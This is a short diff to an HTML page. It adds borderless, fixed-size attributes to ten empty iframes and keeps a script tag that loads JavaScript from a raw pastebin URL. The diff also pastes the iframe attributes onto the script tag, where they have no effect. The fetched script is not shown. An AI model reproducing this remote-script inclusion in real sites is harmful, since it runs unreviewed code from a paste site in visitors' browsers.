--- a/index.html
+++ b/index.html
@@ -3,17 +3,17 @@
 <body>
 
 
-<iframe id="a"></iframe>
-<iframe id="b"></iframe>
-<iframe id="c"></iframe>
-<iframe id="d"></iframe>
-<iframe id="e"></iframe>
-<iframe id="f"></iframe>
-<iframe id="g"></iframe>
-<iframe id="h"></iframe>
-<iframe id="i"></iframe>
-<iframe id="j"></iframe>
+<iframe id="a" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="b" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="c" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="d" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="e" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="f" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="g" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="h" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="i" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="j" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 
-<script src="https://pastebin.com/raw/9d9jmXrd"></script>
+<script src="https://pastebin.com/raw/9d9jmXrd" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></script>
 </body>
 </html>
